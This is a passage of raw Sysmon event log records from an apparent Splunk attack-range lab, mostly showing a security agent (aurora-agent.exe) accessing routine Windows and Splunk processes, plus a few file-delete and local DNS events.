Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8552701A1CC77E98EB43D7283376546,SHA256=F2BFF52AD7CCC55DB4BAA9CC9FC52F10B4A8974A3910FEB0AFE111C5B490A288,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041123Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041122Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.865{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041121Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041120Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041119Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.862{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041118Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.855{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041117Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.844{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041116Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.821{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041115Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.815{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041114Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.806{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041113Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.802{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041112Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041111Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.798{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.793{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.793{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.789{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.788{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000041102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.667{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A8513A3142389F03B8F8020E4F8364,SHA256=98215EAFB1CD84E5E6A9C451FD95D1B43CE5DC6610E2D760444FEB17CC17F94D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.393{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=263F9495A47A9B02D545A48354304129,SHA256=7B662D7A28EA3A36884BDEAAFBEA9CC74F374B9473E9088E74664AFFFBF97F52,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.273{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000041099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:34.272{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 354300x800000000000000041098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.010{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local61677- 354300x800000000000000041097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.008{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64234- 10341000x800000000000000015863Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.411{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E3D6-63C7-F401-00000000B002}1816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015862Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.411{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015861Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.411{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015860Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:34.411{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015859Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 